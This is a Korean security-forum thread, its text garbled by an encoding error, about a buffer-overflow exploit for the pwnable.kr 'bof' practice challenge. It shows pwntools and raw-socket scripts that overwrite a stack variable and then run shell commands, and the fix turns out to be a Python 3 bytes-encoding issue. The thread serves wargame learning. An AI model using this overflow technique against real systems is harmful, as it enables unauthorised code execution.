½Ã½ºÅÛ ÇØÅ·

 1574, 6/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ocal
   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1987 [º¹»ç]


¾È³çÇϼ¼¿ä.

pwnable.kr¿¡¼­ ¹®Á¦¸¦ Ǫ´Âµ¥ pwntools ¹è¿ì±â ±ÍÂú°í Çؼ­ ±×³É socket ¸ðµâ·Î Çߴµ¥ ¿Ö ÀÌÈÄ¿¡ ¸í·É¾î¸¦ ¸Ô´Â ºÎºÐ¿¡¼­ ´Ù¸¥°É±î¿ä.

bof ¹®Á¦¸¦ ±â¹ÝÇÏ¿© ¿¹¸¦ µé¾îº¸°Ú½À´Ï´Ù.

Á¦°¡ óÀ½¿¡ Çß´ø °ÍÀº À©µµ¿ì¿¡¼­ ÆÄÀ̽ã 3À» °¡Áö°í ¾Æ·¡ ÇÁ·Î±×·¥À» ½è½À´Ï´Ù.

import socket

X = socket.socket()
X.connect(("pwnable.kr",9000))

payload = "A"*0x34 + "\xbe\xba\xfe\xca" + '\n'

X.sendall(payload.encode())

X.sendall("id\n".encode())

print(X.recv(0x100))

±×·±µ¥ ÀÌ·¸°Ô µÇ¸é id ¸í·É¾îÀÇ °á°ú°¡ Àü´ÞÀÌ ¾ÈµË´Ï´Ù.

±×·±µ¥ ¾Æ·¡Ã³·³ ÀÎÅͳݿ¡ µ¹¾Æ´Ù´Ï´Â ¼Ò½º´Â ÀÌ·±°Ô µË´Ï´Ù.

from pwn import *


r = remote("pwnable.kr", 9000)

payload = "D"*52 + "\xbe\xba\xfe\xca"

r.sendline( payload )
r.sendline('ls')
print(r.recv())
r.sendline('cat flag')
print(r.recv())
r.close()

Ãâó: https://mandu-mandu.tistory.com/71

ÀÌ ¹®Á¦ ¸»°íµµ nc¸¦ »ç¿ëÇÏ´Â ¹®Á¦ ¿©·¯°³°¡ ´Ù ÀÌ·± Çö»óÀ» ³ªÅ¸³»´Âµ¥,
pwnÀ» ±¸ÇöÇÒ ¶§ ¹«¾ùÀ» ÇØÁ־ ÀÌ°Ô µÇ´Â°É±î¿ä?

¼ÖÁ÷È÷ pwntools ±êÇãºêµµ Çѹø ¶â¾îº¸°í Çߴµ¥ µµ¹«Áö ¸ð¸£°Ú½À´Ï´Ù.

  Hit : 2276     Date : 2020/01/09 01:38



    
±ºÀÎ python3 ¹öÀüÀ» ÀÌ¿ëÇÏ½Ã´Â°Í °°³×¿ä.

±â´É¸é¿¡¼­´Â socket°ú pwntools´Â ¶È°°½À´Ï´Ù.
´Ù¸¸, python3ÀÇ encode() ÇÔ¼ö ¶§¹®ÀÎ°Í °°Àºµ¥ \xbe\xba\xfe\xca ÀÌ·¯ÇÑ Á¤»óÀûÀÎ ASCII ¹üÀ§¸¦ ³Ñ¾î³­ °ªµéÀ» encode() ÇÔ¼ö·Î ó¸®ÇÒ ½Ã ³»¿ëÀÌ ¹Ù²î°Ô µÇ´Â Çö»óÀÌ À־ ±×·±°Í °°½À´Ï´Ù.
2020/01/09  
ocal ¿ÀÈ£ ±×·¸±º¿ä ±× ºÎºÐÀ» Çѹø °íÃĺ¸°Ú½À´Ï´Ù. 2020/01/10  
ocal ¿À Á¤¸» ±×·± °Í °°³×¿ä. payload¸¦ ÆÄÀ̽㠹®ÀÚ¿­·Î ¾²Áö ¾Ê°í óÀ½ºÎÅÍ bytestringÀ¸·Î ÀÛ¼ºÇؼ­ str.encode() ¸Þ¼Òµå¸¦ ¾²Áö ¾Ê°í ¹Ù·Î º¸³»¸é Àß µË´Ï´Ù. °¨»çÇÕ´Ï´Ù. ¾Æ·¡´Â °íÄ£ ÄÚµåÀÔ´Ï´Ù.

#python3
import socket

X = socket.socket()
X.connect(("pwnable.kr",9000))

payload = b"A"*0x34 + b"\xbe\xba\xfe\xca" + b'\n'

X.sendall(payload)

X.sendall("id\n".encode())

print(X.recv(0x100))

°á°ú:
b'uid=1008(bof) gid=1008(bof) groups=1008(bof)\n'
2020/01/10  
±ºÀÎ ^_^ 2020/01/13  
1474   asis CTF ¹®Á¦Ç®´Ù°¡....[4]     vngkv123
04/12 2266
  pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2275
1472   pwnable.kr uaf ¹®Á¦ Áú¹®ÀÖ½À´Ï´Ù     pkdo1030
07/22 2279
1471   µµ¿ÍÁÖ¼¼¿ä ´ëÇб³¼ö´ÔµéÇÑÅ× ¹°¾îºÁµµ ÀÌ»óÇÏ°Ô ´äº¯ÇØÁÖ¼¼¿ä ¤Ð.[1]     morieye
03/14 2289
1470   checksec, ELF±â´É, ±×¿Ü Áú¹®....     vngkv123
06/14 2294
1469   remote exploit½Ã¿¡ ¾ÈµÇ´Â°Å ÀÌÀ¯ ¾Ë ¼ö ÀÖÀ»±î¿ä,..[2]     vngkv123
08/13 2297
1468   ¹öÆÛ¿À¹öÇ÷οì Áú¹®....[2]     ewqqw
04/16 2304
1467   Æ÷¸Ë½ºÆ®¸µ °³³ä Á¦´ë·Î ¼³¸íÇØÁֽǺÐ[1]     pkdo1030
07/24 2325
1466   ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ BOF °ø°Ý½Ã Àǹ®Á¡ Áú¹®ÀÔ´Ï´Ù.[5]     tjdalstjr938
01/02 2331
1465   FC10 1¹ø¹®Á¦     exqa123
01/24 2334
1464   libc-db¿¡¼­ main_arena ¾î¶»°Ô ãÁÒ?     vngkv123
07/30 2343
1463   ¹öÆÛ¿À¹öÇÃ·Î¿ì °ü·Ã Áú¹®..[1]     ewqqw
04/17 2352
1462   RTL±â¹ý Áú¹®[6]     vngkv123
03/23 2353
1461   argv[2]ÀÇ ÁÖ¼Ò¸¦ ¾Ë°í ½Í½À´Ï´Ù.[2]     ka0r1
09/23 2370
1460   ¿ë¾îµé Áú¹®..[6]     vngkv123
04/01 2378
1459   ROP GOT overwriteÀÇ strcpyÁú¹®.. lob fedora hell_fire[6]     vngkv123
03/26 2381
1458   Rainbow table ¾Æ½Ã´ÂºÐ ÀÖ³ª¿ä ¤Ð¤Ð?     ingod0707
10/07 2397
1457   BOF¸¦ ÇÏ´Â ÀÌÀ¯°¡ ¹«¾ùÀΰ¡¿ä?[7]     turttle2s
09/03 2398
1456   Á¦°¡ ½Ã½ºÅÛÇØÅ·À» °øºÎÇÏ·Á´Âµ¥ µµ¿ÍÁÖ¼¼¿ä!![2]     t0mcr00se
01/18 2402
1455   ftz ¸ÆÀ¸·Î ssh Á¢¼Ó [1]     bunggl
06/30 2406
[1][2][3][4][5] 6 [7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org